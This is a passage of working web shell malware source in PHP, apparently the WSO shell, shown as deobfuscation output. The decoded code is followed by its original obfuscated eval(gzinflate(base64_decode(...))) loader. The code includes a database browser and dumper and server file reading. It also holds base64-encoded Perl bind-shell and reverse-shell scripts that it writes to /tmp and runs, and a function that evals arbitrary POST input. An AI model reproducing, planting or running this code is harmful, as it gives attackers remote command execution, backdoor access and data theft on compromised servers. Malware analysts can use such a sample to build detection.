</script>"; if(isset($db) && $db->link){ echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; if(!empty($_POST[\'sql_base\'])){ $db->selectdb($_POST[\'sql_base\']); echo "<tr><td width=1 style=\'border-top:2px solid #666;\'><span>Tables:</span><br><br>"; $tbls_res = $db->listTables(); while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if(!empty($_POST[\'sql_count\'])) $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\')); $value = htmlspecialchars($value); echo "<nobr><input type=\'checkbox\' name=\'tbl[]\' value=\'".$value."\'> <a href=# onclick=\"st(\'".$value."\',1)\">".$value."</a>" . (empty($_POST[\'sql_count\'])?\' \':" <small>({$n[\'n\']})</small>") . "</nobr><br>"; } echo "<input type=\'checkbox\' onclick=\'is();\'> <input type=button value=\'Dump\' onclick=\'document.sf.p2.value=\"download\";document.sf.submit();\'><br>File path:<input type=text name=file value=\'dump.sql\'></td><td style=\'border-top:2px solid #666;\'>"; if(@$_POST[\'p1\'] == \'select\') { $_POST[\'p1\'] = \'query\'; $_POST[\'p3\'] = $_POST[\'p3\']?$_POST[\'p3\']:1; $db->query(\'SELECT COUNT(*) as n FROM \' . $_POST[\'p2\']); $num = $db->fetch(); $pages = ceil($num[\'n\'] / 30); echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST[\'p2\'] . "\", d.sf.p3.value)}</script><span>".$_POST[\'p2\']."</span> ({$num[\'n\']} records) Page # <input type=text name=\'p3\' value=" . ((int)$_POST[\'p3\']) . ">"; echo " of $pages"; if($_POST[\'p3\'] > 1) echo " <a href=# onclick=\'st(\"" . $_POST[\'p2\'] . \'", \' . ($_POST[\'p3\']-1) . ")\'>< Prev</a>"; if($_POST[\'p3\'] < $pages) echo " <a href=# onclick=\'st(\"" . $_POST[\'p2\'] . \'", \' . ($_POST[\'p3\']+1) . ")\'>Next ></a>"; $_POST[\'p3\']--; if($_POST[\'type\']==\'pgsql\') $_POST[\'p2\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30); else $_POST[\'p2\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\'; echo "<br><br>"; } if((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p2\'])) { $db->query(@$_POST[\'p2\']); if($db->res !== false) { $title = false; echo \'<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">\'; $line = 1; while($item = $db->fetch()) { if(!$title) { echo \'<tr>\'; foreach($item as $key => $value) echo \'<th>\'.$key.\'</th>\'; reset($item); $title=true; echo \'</tr><tr>\'; $line = 2; } echo \'<tr class="l\'.$line.\'">\'; $line = $line==1?2:1; foreach($item as $key => $value) { if($value == null) echo \'<td><i>null</i></td>\'; else echo \'<td>\'.nl2br(htmlspecialchars($value)).\'</td>\'; } echo \'</tr>\'; } echo \'</table>\'; } else { echo \'<div><b>Error:</b> \'.htmlspecialchars($db->error()).\'</div>\'; } } echo "<br></form><form onsubmit=\'d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;\'><textarea name=\'query\' style=\'width:100%;height:100px\'>"; if(!empty($_POST[\'p2\']) && ($_POST[\'p1\'] != \'loadfile\')) echo htmlspecialchars($_POST[\'p2\']); echo "</textarea><br/><input type=submit value=\'Execute\'>"; echo "</td></tr>"; } echo "</table></form><br/>"; if($_POST[\'type\']==\'mysql\') { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, \'@\', `host`) = USER() AND `File_priv` = \'y\'"); if($db->fetch()) echo "<form onsubmit=\'d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;\'><span>Load file</span> <input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form>"; } if(@$_POST[\'p1\'] == \'loadfile\') { $file = $db->loadFile($_POST[\'p2\']); echo \'<br/><pre class=ml1>\'.htmlspecialchars($file[\'file\']).\'</pre>\'; } } else { echo htmlspecialchars($db->error()); } echo \'</div>\'; wsoFooter(); } function actionNetwork() { wsoHeader(); $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; echo "<h1>Network tools</h1><div class=content>
<form name=\'nfp\' onSubmit=\"g(null,null,\'bpp\',this.port.value);return false;\">
<span>Bind port to /bin/sh [perl]</span><br/>
Port: <input type=\'text\' name=\'port\' value=\'31337\'> <input type=submit value=\'>>\'>
</form>
<form name=\'nfp\' onSubmit=\"g(null,null,\'bcp\',this.server.value,this.port.value);return false;\">
<span>Back-connect [perl]</span><br/>
Server: <input type=\'text\' name=\'server\' value=\'". $_SERVER[\'REMOTE_ADDR\'] ."\'> Port: <input type=\'text\' name=\'port\' value=\'31337\'> <input type=submit value=\'>>\'>
</form><br>"; if(isset($_POST[\'p1\'])) { function cf($f,$t) { $w = @fopen($f,"w") or @function_exists(\'file_put_contents\'); if($w){ @fwrite($w,base64_decode($t)); @fclose($w); } } if($_POST[\'p1\'] == \'bpp\') { cf("/tmp/bp.pl",$bind_port_p); $out = wsoEx("perl /tmp/bp.pl ".$_POST[\'p2\']." 1>/dev/null 2>&1 &"); sleep(1); echo "<pre class=ml1>$out
".wsoEx("ps aux | grep bp.pl")."</pre>"; unlink("/tmp/bp.pl"); } if($_POST[\'p1\'] == \'bcp\') { cf("/tmp/bc.pl",$back_connect_p); $out = wsoEx("perl /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." 1>/dev/null 2>&1 &"); sleep(1); echo "<pre class=ml1>$out
".wsoEx("ps aux | grep bc.pl")."</pre>"; unlink("/tmp/bc.pl"); } } echo \'</div>\'; wsoFooter(); } function actionRC() { if(!@$_POST[\'p1\']) { $a = array( "uname" => php_uname(), "php_version" => phpversion(), "wso_version" => WSO_VERSION, "safemode" => @ini_get(\'safe_mode\') ); echo serialize($a); } else { eval($_POST[\'p1\']); } } if( empty($_POST[\'a\']) ) if(isset($default_action) && function_exists(\'action\' . $default_action)) $_POST[\'a\'] = $default_action; else $_POST[\'a\'] = \'SecInfo\'; if( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) ) call_user_func(\'action\' . $_POST[\'a\']); exit;' );Did this file decode correctly?
Original Code
eval(gzinflate(base64_decode( '7X37exo30+jPyV8hb3lraDAGnKSpMcSOYydOHTv1JVfnowsssPXC0t3F2E39v5+5SFrtBYzTvt9zzvOc9mnNSqPR6DYazYxGzpXtFcVqwZ5Gw/bEDkPRFNaz+s/9+lO71rX71d7PnZ/t6i/VZ1Wn9rj+S+/nJ7W61XhY6PqeHyDwD73+E0zoOX176kVtuxu5/hhyLlb3Xc8J39rji1Ujfxo6bfsP+xogomDqGDndoR2ETkRFp1F/7RmWe+j2iyvOaBLdFAvt072T93snXy5WX5+dvWufw2d759Xe0dnF6tdSSXwTBUAe7AyccYTtsIPAvilar3x/4DlWWVin3jSY4I+3p0cv/Ah/uXbbDrpD98oJ8POTPe451/jrxB51PEgsNQRQMAmcQXtkR91h8WJ1/WJVVIQ7mnh+z4Hvvy9Wy2bVJcgFKJeS76R56Ng9Jyhy/nqtUhWPq4/FkR+JfX867l2sAgXOtRs1xC38u+2O3TZ0EsA7QeAHbc8fQD1H54eHAGfkQnqbIELIribzRvZ127l2ulMcqXbkjhwFA/n03fbckRsVddrIHrjd9p9TP3LCdjAdIwznwuC5Y+yFD6fHbWjo6cHxETb8YrVeeULEQ/cN0igGk26RWt+fjnm+QPEwCtxJ6Nnh0AmLBRo9BAmcaBqMhRu2eUBVznMeYEA84erN8tT3EnBT5GHG/iy03x2fnsFUydROGQBTaO8eH/96sJcLw1mESbdjFvqH/sAdF5H0nusUrS2YPML23MG42YXp4QStrb4fjMTIiYZ+rznxw6j1DlbezA96m2LLHU+mkYhuJk5zIlPF2B7xV8vMDqcdGCQBK3jqNC9WWy34b2sdccMfqLRlJUnDBjhR1/cvgazCJXTQFS0a2Y4vhcuv0MzCVUNkwBCPsRA1t6AxhAw3xJnFvQZTHbNwfosffxTFUe9JTk4TajLRJIjjIsmV8xoQYMmyWQ5nlyiuqOplQxYVh6r//lssCStWUlTGoyt7BGZEBJxwBisYhgO+iu9ev2sfn5ar5Y0StdKauWOrJAp+SIwNvoCtCccLHZ02dq8xrRDafac9AqYCqbRcB7RcdbJaTisxZEkwGwiciR9E7nhAq7LQc0Mb2FdbjX2YxJjJJsyFoQ8rvzvrITAAwq8iV5ga3i7zru3usOcGqWRAk4eBmqrbT9POqA36DVvg2V1YLxfwD3LgdfifBorxzodlMBoW/P0FID1nTL9LazUaTGLeJUZVkZ/cpfeYQsTecQvjbrh3GWhEseP7XimzJ+Z2VQF4hx068Y4mrEM3jMRLN3C6kR/cWKLZEhYMBfbEvjvuCRd3scpkOIFfojsNAuA7AgEUpFgPxfpMrHdiUF34p64/7ruDn5Yrb0LTHjv0ZwJlgCtHQNbY4QnGJcdOFEZ2JNbssYaF3WQM8xZ4TnDldp0YEkbaDmiTPoc8wNmF/TAy8nHH1Wi6/ggYoxMY+VeuM8P8nZN34gznO2fZwQQIwIyDd2KXqJ8GNlLJ+e6EmyTWbc+zREkt1jnDoLvFC8WaNyTEHmb0QfoRdgRbRgcICwVwYFscuuPpNbQVqujBth450P09Bg1vwsgZKVxYUKxdEboQG+hPnDGA4jLP9qb4WwxgUYg1V2DdDnXvJPChP0Psx2gqy0xCYU+v1VhzGn71ceShvSKcukyPLEAZ62INdxzRF2sTB7auterjarUKzQ112bhc7pwhmMrdaIiEwVIk1DMkDL6HhAwaHv2KO+7SClhACG7LKfAUlp/uLA78S4LCr/zSS7VmATLs01ngRrgERN/3QNyEWTDO7WPulHpmTOaXX0jdPHRysVcms4UjTY0yYOOhTpdfvo/y0CFJlWFE8tbdBGlIXT5VdnlisqiIlA5ImO0hLGTg7neTY0LHJGVx3IOsXJREWh929eHIdr2gezdlBnBMWAbDPehKITz0u3bkxFzMo28xjKJJr4IrwSQxk2mUuBqCFB7OK2LkGmWAvfYX1GNmm6XCmw6winmF4lyjzOhmHrzMMWDt3sgdJxlXJssA7/YHaS6XzDFhoaZ5wDIrBQ18sWdHc+A5M1tifg1uHkXMe+eXgMzcEoQqH35OS1hYW0yfAZTBoNh5TjkD1hzqeOwuVin9YtWETHHPGBQykpDhn14+JGQkIfO4YAyucpNl5rGruJwJkSw7ugESFhdOgCRLz+FGcVkDIFGyY3cvp3njyBkGZG86yoPD5AQzcK9ymYB7RSKkqR94zRofeXRWui11iGIlmDpaZFLxhP7q8PjFzuEppKdUZ5DfEAPP79ieYA0dCK/doS+srWE08lpbqGxqbY2cyCY+uOb8OXWvmherIAaD0BitnQG3vVjFSYmfkBGBjLqOZRtC1tG0gC3nEVYRFiogIjfynBYD5Z6FEFCs4YFfIJShNxIVa2udyz/cCqMb/NvxezffcFAGAarD1qhVmz88fvy4IX86Nfy3cUug5ahXjobfQEwZR5vil0kkDqddt2eX3ztBzx7bjZEdwPl9s9q4cuC83LW9NVLNbEb+JIVQ3D4kkQc4Qt//JmRmv99vZMmp1+sIH07scXlYK9sKXI6CWHFHKLjb40iBMYlrM8cdDIHSDolVmDmsfYOvAL7WPKcfbT6ZwHnB90C0lSM6sXs9ODBtijrkQG6D21p7DI1VrcynULUdykBFPfeqIgf6m9BIESHD6epzsG1sbCAKaCdOkLUenGf4CLU59scOZW0OfejiLABgcQLPZajKyNPN3azpltLwKpJiimDUEGff82ebcIyJfELRcQd24AApM7cXDTdr1ep/GkPu1o2qbCtpzcpICoKWQ8eDc+k3odEuHNwnT540MiSq5RVPtLf+2IeR7TplXE/TwIVD65EzQwXD7UPUysX1MVE/RL7vhWcdT3YST0TWEVLLKP9gPFFNE9Qe6jYbZCaY50Y5HK084h38t6HLBHJc5kECIAxJ7oLDrHpOFkyG24eTwPlGM7pvj1zvZlP2QFn3CpCwtS4X9VbYDdxJ1Hoo4J8rOxDdNinCkB8gswknTte1PWIuRYPddXHnIWWKhbYBVdpeUHpbsyqbi0LJuFrmXksVNxgzIYmrn9RiBEXUCE58s+CkBmXK1sXF2CqtNJt92wud0vOL1YvVzWxbk4X2js7av50fn+2dljKV1hdXWv+eSut3VbqxuNKN76l0445KUenX87vTESyMxsMHeidFfZ1d7pYntfKkXp5slOUIwb768MED2FntleZ46nmlXmXUr9gV1pPbDdLmJNPaDS7RNUt0ZW7XKKHTVIlJzSwyqcn8Sc0oZKTqYvVEsboCqJvF4lRdbCNRbEMBbJjF4lTdLO6YROM4STWHv8yG5uUjvltjBAYL+n/u6CBNVAWbL4qlFFL7e5HSBLUDe8RKddSnNtHCiHPpwQNgwEW3WW24W1Q5bAA4n8KK54wH0bDhPnpUAqgHEsEjxPDjxeqjBPAX92sFz6GPLlZBNHrkjLt+zzk/Odj1YXcfA0QxA079R+SFaOPDhQPbWmxC0hLSyd5v53unZ21Ap1lMWbYn3UWAahp4OlfOd1GcwZnZn1U+vj18DcLdCQh3ThhRswLnT+iUsTMTyUzq/Qc07AaCHVLffjzu/AG7ZKp8Ig9a9NbtBn4IR12qFsQ8NCXQ2sV/ECmURRKF8Q8kVfwx7MS9G1ROgohqjwdo9ZAqS6Bul5Ia2WITZwzVviNZsiyoH3CUS1lQmBiymSxxi2Ja0EUzpT2ZeCAHYseuX6/NZrM13KvXpmg7wPHtJRoU4x73inp0VM5tcpzSrSlq1kS9UqEOOMUOQIX/45KgvoZsqoG0tphRr1a5IM/xwBnIsThxBnvXk+LFhVW8kP/0HpWKX9THqfoRfv2pRIaSi9URNUfhsoOgCfgqaA2WJIUwlUPnDAQLCeegiwAAfql/rUgbV7WMJb/U4IxCMLesIrc9kKmhk2Wvs2lqhSuk3V/u+vIYgvJ6awvEUEFiASwp2E5cEhLtDkhZ08hpGDJd/iEA5HaQ30hUrTbg/PEwY1xl6+mor2vpueHEs29YVKUihlF16PZ6zpjL2POzuvOzJrUFefUFeRsLqmM+BwBs37UaotAPHOcUJSs0tkGbLjGBRK0ckQngIz+yvUSBNiW1ly1jfD03fm/CUakQANOzQ8I8GU7aU6QaZkLAhsVLJxg7XjpTWh2da1iA40ti2ngo3VxfxyTfhWNDB04oo/XQQR+N9efsWtLkzx/htA2Ccrvn8LTCHGnMk4LJxSpZW8gVgCkoCRBLBMslccWVptCrXRUSvzLJ5OohZ71qZLlaflrSZqFcLKrFaPWbh2OjJK25il+0nWs3jJBuXAfXaKt1Bi7yH+3bIu2qbakuRcNhgBbWAlpfOG90A78pbWCkDVQaLKAJuu08t9BUSk34povreiczRBKTQSgNnDpnEAwSgAMFKKlFzDCjcMRJOSFrkslTbN1XgyzEnwDn+mTyQILfkgG3jd3Oez1Zzyd2NIQvmjswBGwTzpvU4yZZEotUAnUzIBoUUDYQBXerMF7D+YzyAHZMXA+Mr7Vli2Hg9GGe/QCD6o+7sHNcwtcAebD2dgJGi+YXifgPQvzHVrPg4l/Em8RKZHwp/PG1Is3RqUoBVwm4lFWRgCBVWOtb63bL4p5g1hDbJS9Wz8/20XkK2f0H2tHDtVr9SY1Tfj0+eLZ2Yvw+59/dybOnT3lF+hOtUYr7Fxrj2N1hMa7QDqGfImdUSpUgw/qWT0tSeqeAMFMh2ArKQPCRp/BqNgkEDgx8PsetdxMrL0GploFha52Rt6i3RkbLT51uRRyM+z5IaC365I+ydEbj5NgvjY7qY9hrHM7RH5BxiqpRwoI/IOHdcMIJ9AMhogAt13RMl6CUcsYJAPEigE0Meq4r8ZvfkH3kRDM/uOQ8/SHZglQMxjNYO6JI5eAI0g79gT+VesH4q8GZp47XB3FhBAd+BYFJJzIFoZzxNDvCIxraS1RkoosQQ/GowhKjLZlGtOiOo1IRNud1uaBGJRyq/1itL0ItFesHSy8UC9cJ1lUpXAEc/i7jkaRMqfiV+VGyaOAvadTtlvi6tR4Nedx7AQii5K9osd9E3FN+SO1N+Juo1gUkiZG3CozAX5iJrSVsJXZ2aZNbC6VUcApeECUlXSV3xfwGxpxAtQSaoNGty3Z9EWYytgzaR9oi1tlib5PJtQunhbCJWkjRdTxP6sWaG/SFmzd+VeW4oKjU2ooC+K+nklpbqHFsnSNb3dzqBC10qKAfMJPp7+tej/7uznqbtF0t6k1YoAj7kjpjU61R2utAxsOaYJB6LcKDjQBRb+xDAXMfNASBUlmAPFmrVxlFPHMIPt5fSe8Q2QFsM812x7PHl60vSUGBunBrnSrbUhXSjkOIi0Im4NZEKSXBPfMKt59NSbyEGqSL8R7F5TR2bMeVE4TAjYqKfsJyavcdgR5aSbRmvxp+XV+xT1F9xnpjkMl7reMjFPbGUYt62MwdgKAHndxpHe/vb613Whou1YM/pCcmMq78RYezS89LaBPNNp6S3J6XcEpBr89kc3qQCmvp09porSdeb7qboZ4Jqodmof/edWan7l8gFsVSY6Kz9qFBScSJUlrSlYWgRuhJZD7CyFw3sP9Uq8rp9J94rMx9leUyquedE4zCXezYfFXjog7NWelYUYxG+a+x3WMelzPZ3ReBZbjvY9IV56E1llhcapFLF9MAFd9ywW3xPopE0/kTqaahz/tfNHRDqa6wWrh783z37I7jNa13NpzP5VZtSZqSm76Q+zIVgynJdVMT5IpwAlgp4uCdGul4EWk9iMV/2zsvX55YX/VEYgS7nosuAjkIEnqUt8dne4RA9bniCNhv8D/6hYw17kRis3w8tKTtBc+V9dgggQYP6z7sl+ninZMHLa7XOPNa0iTwxGox6zcNhfu+H0lDYQF2Je2D0xTGV86kfW4Jk12AfIoMA2So4gco5GCpkuQZ1mYSFhlPEZ3PFXoNqCyJcAQF8uEkmtmc3F5TWTSW7Cmhz+Tze13mdPwo8kfpTDy9P8DufvjgAW00dPgHIY50iySZx5NbKm9ROEeZuiEdy+k4iJjkLGNdFIgA5jSTB3Nu7cWqsszAKNNZHe0w8qSu/bGXNmaQ2XRZv25o5Jy2XiBPYo6kBNC47X2liUw2+sKSrT5xbDb5f1ej+/ekn1fD/GEzmsJiOm9Yq6NLGBb4pCb17mjSW/syMYzmErpX63r/W6NDLcRBwDPAolaZA/XdzfrvDFp8gsosvLlt2qO7KN839eL19k9WkVQXkuYFzk9i72j37NO7PUgYTb3IndhBREXXQOCxiek8mKs01FXy/N0ZL4ZPMowMf2D2sKD8pKYRTEEYtnv7NIEWVikvWpkVZ3z8Y3Pn85xELfMr6viEQQT8k+lJntD3nJ6dQIjkJFX7LO1UICGTopncWFhpQpdG0mo3K6n9svj2itQlmj432csTX1GBkiwOvdNUJtDERaeUjq0wgdzEuri9m0DSun0/gVT8bgJZt5dPoCmm7F0XC+6YpBR/Gml1ArYhq9pES4PUaG6T1QGKlrEcKZ6o+PYfvjsukhlZ5bCmMh8jakSiYTCVWP1Omy4OoLpzW+URgboCACElqufY8ibPfOzslZ+Hm3P+AeYhSEVtoz8kjjhd4o6RwFoKnNCfBqiv77MiFu1h2IdWYJVMNKgVmQ1hORVXtvuO34cCqMLAzEpT9NH2BEnlWrX+GOqYdD0/RKRUnxxuBE7LpPGpLJQObIVQtJqiVv154+fHtWeATRUPJwGc0frQ1P/UKvU+6eFDsW6AihIdr169UFeiDHSPnz35+ekSuAhOyIPa2zxMS5GExDCOXzUO3Q/ywPgiK6LT4ZHXCE14+Cl+FNXr3SoeQJtN9bPg0roIY/Ji2J0YdseA9fJgn8WwzwzYtTzYpzHsUwO2kwf7OIZ9bMD28mDrMWzdgO3mwdZi2JoBO4nvwHHClFR6Lk5NXbZKh/jngsxIYpObWcqCVZ9JsNlisMcEFic8U+hDWe6aVEKbeSCnBuo83PXlKK0tR2n1WZLSx3dT+nhZSquPl6K0Wl+O0lqS0roiI5pLqQY5S1KqFpubu8akgqavFtrKNjFDu8dnYORtEkFSV/bD/j5QWdW6KF6w2yhnTHjtYlE+okstWjyLqZL4oD23EuCzkXP/KuZQXH/S79+X4mSPnXbtMeuw3UBy6YwwETKMVTLuWIdmOdM+2EPLGm41Ri5tLrCxoUxAdlUgDFLookZT4NAw8BC3JcoKv5D7soKKh5wy+YK72YwPQxfNEcRclXmP5Q2Yl5gnNbOTpMWEzHp6pOhTV8USjFkPG5WlpYh0LYaLdkOr4oc1pcAK4bACU+JGoNIjGJHnCAiXNVbrsGAr/WppaBID43TfodNIsTDW16+vKBKCC2lX8q4spauKSYrmdo5p1DeFFK2T1u7CVVmw6x2wW23kJixQRaySlVNPocfL6UzzyKvJeiQ43SHnyXWbIB7NSNwVfj+a2QF50qCd2RlfYSbr8E6P988+7Jzs8erOmYLoe2N3hw6JTCO/NyUDHd+yNuo6hCOF0xM7BCs0XNmIwIDSbVlksRVLWHUS3UuWjnvi3et3Yj8WkRPG4jwR+vkd+XAkQo8S4pPJKo9h4YgOukew+sK8io2Lqo15lJUlV9sRBEqEOQi0FYFExvadaNxx15v28kiJMUmYeci65yeHIpxO0KUdcWQHFlaI15Z2EcDwHOT+MfU62TLGPm8mID5Pmmy6nTdD+O4Hy9So/W2ToYKMcViaGIr19ub0T08UrUoudLFUsUrWPPwhlpAXlTN4T09/O5xXcjKYV+ydH8LZyVlQ1u+68wofBzacHqzM+HFvw7RFDQTOl9wlQIhKBtuSS36ueZRCD0imZ1R3IjdWse5E3XV15wdni7HpXqwmckvPrRsnFHf7SLD+i9zRLixCoT4kKnZ4+IL3t8kMYsVzZhGZ4dDu+bN5ZKrcf4FMiWppMo9PhV4LQBzudjxJeZfAGbGOvoLr8YrJY1tRINgxZh4OpNENw6lTGTuRZrsrc0yO2qmoP/UMF4pBly3jnvyrPnv0Z2RfsuvCRPpAgEjC3hGTm2jos0tFMO3c0A84K9PfwV8uQ3fMH3X6NZb46cIU/cSr5IyWQlmgOj4wCLy0r7ig39tgFJ1e1w8cJnB6hUIM45GAvWDmdDgXdroR/wouh1O8aMHJw8vA96NLN6JPd0ICXyg/+jNuTOBOZm4gaRy6jteTfUN38mEQAm51OGa+iAstdGTz3F5o90aMqIuLdsCw125Ptn8Am1f3Un3MMNgQg9yEIzvkjL9GHWjeRDZvNnI97vwZCCK63WN3/IctO8+fjVElhze24x6cDRymj27HcY0342tJ6PiSG448nEdPQnuzydrIRZ9ODkqUZDEpbi7dLUAoVFMsdheCSRlLd5RkskBKSU//c0aSw/M0y5tLgJxB/6j+l4Tj+6o3xuCf0RAjWkRIPC7rNDBJJK9fvhTk8InFlDDd64u1YR7XeY0XnxcznCGDpGtmuTWp7IQtGjm2Ze4qJaX0lyrbtFFBm/Dof9YTi00K5Hot71UYKfU5lga6mEg+Ma39wB+xKThKGnZimwIjl8rmqmk4ljjO/GUw1CUGVHzkWJ/nqretVstSym2lSCXtvEhf1RHJWzSkEIatbzwdOYHbTUHPz93Q8dNwDkndITovNpIYxFYzVWMKQDpN5nuTpqjhdiGsnPioWSDNL8mIZcqp0InGdInKn9XIHsJYAOIjiz6+Znbj93o3VivgysmVdHc46Iw4dSIMrhQaJTDCjIpJk1eUgtbsaIBEOWSJXCZuGNkqZMuU4T/noPpuOFE3h1MWmzgi0bflo2kZcYnUPYqElpuc/5O30hSvw3mi7mVVYJT3+NrLi5uDXpFcjY6n0QS9EUsVsvJXpN89meoaS5Z0QUgOXp+9PWzqyzNddXsmY1xPat9LfB6+uAguLiL24bu4qFrq9iBPLOp9FSiK5o48RcupFMfey17VVh2O62ollcc9dY+wZomBqPJsirUQOSHW9JJOpbFcr49J30wNBh55MWeeukJeuq5MxDd5xQJYV+NW3dvE2WlODuknRo7lEU2ItP1DJlP4RBW0i7ZI8qpbKaJl7m978+Ji9uhvur4toh78NyyLYQ3+qwP9lZ9uV0ahK72UVzhffCtWfiolMrbc0eDL/7S+Pmrp1FJZxJUxWMUpi8oV/DfE/whToXbLeaipLBPJpXhiaLKpB0kO2hrWmdUAoKiopavkoFuzw/dUlEXUNqzh1YC5XU8bH28e/cT1Fb0ZWjALaKvDaVIhadHplb7ZWdc+trpDbWo7vEVO+C3HCTAFGTuiNW4TWyhsSOr2tLQhoy6BmyAvYKP/D+DehQz02S3mL4nnd9x5LWmPb9gnZY3zt8o9+JP0pCIXoieTa/ankkORiKpIHdfxr6W5HkORyn1aOqYvEc6tolf/czw90EiYzuoC74cBm0f38J03Ox+VqRq1bdxNzOIU7VhxfndlrivpSpLtRe80Q42XUIimmdK3JVg89dxdHDaxf6G2cNldTLn2FLU6n0g14jLC4SQVXo9TULCYjmH/BJrIDJkqcEfDw5mLQVxTOZDRRfVc0oVik1Bto7N8m9OdXhvlYCi+f3C4dyrrhD/ACtry0goKZalcmVOS6lhrFw9qIAXE3hIrsBV1YKZfNhQh0tVJ0XCZiLTIzD+FrgvlI4cuBqJeP42w53hORK3SY8FJLxEz6cwNNbuKZknf5bVaqdmUsROfM8wm/V9fWUkaCOTFGmkhEHzASRkFROIy1jehYBivPADh1BBFVHeRq7g8O2FUzUrF4kieuZkWokfW6o6nDm5DGEWqSV2NPyWsFEE5s8khFEtmr0goEiNh1uHZWCfeCjKZq+Y0xHYwMht/K+8S8IkwviQvp7W+bGGm0/mwr+zqfd7KKxXsdqMxaPiHsznG1OhJk71xbQGNQ0YT+hn62cSfnBxwFovUjDdWlN2NtETR9Sc38iaFmj+Y1KaixUK3XAjLBdiOTFq6lUJYgiQ5fXv4iXFGcRHrydLlVDlZpF+DniloyTHmCduW+xjLk0YZw9Dp7woasxJEAWqeouVCHxZmT38bbhVILa9qJldsIwr+kmWYhekRSzIkOWZmvTEExkTlunNuomkK5nQ5X9NJdDkxo//3u3z73+lzoJmXfrLDK7kdXpEzf3Gfk4JSrkDaUGOt/Wd3ssOxwpXDDgDLq9hxXlGxFchca7F7TurUXqPSKnpugvRS4642L+QNia7NdArupkQVDPR+PkhZaI4hceUQyaiYZQd2RHHg+T56dwoH6yvnQKarv8VErg5cq7MLfTlFEoozjZ1uozk3zVaBxVnZ9XE7oISHbBfv3d6U6LrvjVYCyH7OuwlKSNjzKaEzmD89puN/ZYIsNcbmBMrvf4IAITkAEs/85dt4VytJb79ojmaFMjMWu4M6aof82EBGpbNSRkpT6pAIw/D0/7piU36yZOa0G1+njpWfIg9/qbFg2G8FCpBRjugYH9UpqSyPjRTtviTWxMbTKh7N5d4pg69tLpY4ExoA2c2m4k7K2ykwqj2WctPiQwa+S0radChuvc1LC36uWwOuIDGyx/bACeYrBjh0w6TWxnA0GFumaVkNHdKBZUA3kOE12E9DeaHkRQ9/nvjczBsmnJ4mSlNYlOTv8s2riCRPgWdZGZ92BQhKnED4MIsdocLjhX4QNfiPYRpRBrbaXQeJ9KMQK2G7+GVn7a+vj0ptOGb3vtVuSyvZkYZvKoGsOFE1J3+pAQTdbJPf9a/xIcvSYbOMUDC2DCpixrchd5q5IW6A8jQIRqpRUrA8z8IBGVgABQDJg5ZnXgzNlM6t6tx02A++McTXfy5W8QIQxhqUnuAYngw/jatCF6tVmaKuEl2s1uMYH+wmTiE1zbcUWEk/jOvZmFyn7gZoFUBs98WO1NR0h5ed6xZdNd7C/5a99i/vVVohHQbbVqVIgwyj+ry6WSNtNtmMjyCX76p+fw0h8IX5NaCL7j+tYeT33P7N/DreUn6iluPZ2AnW6TrtP6mZ/NzmV4weccBU0O8mUfsO++LwN5paLOZKofI6i42gFAcCvuTF9ZjPmPEgKBxEQ8eC8Gc5Vg0yjPnYbBMLRmngeBlBTrgMKkP3JHPLsM40yZHoLn4Sllz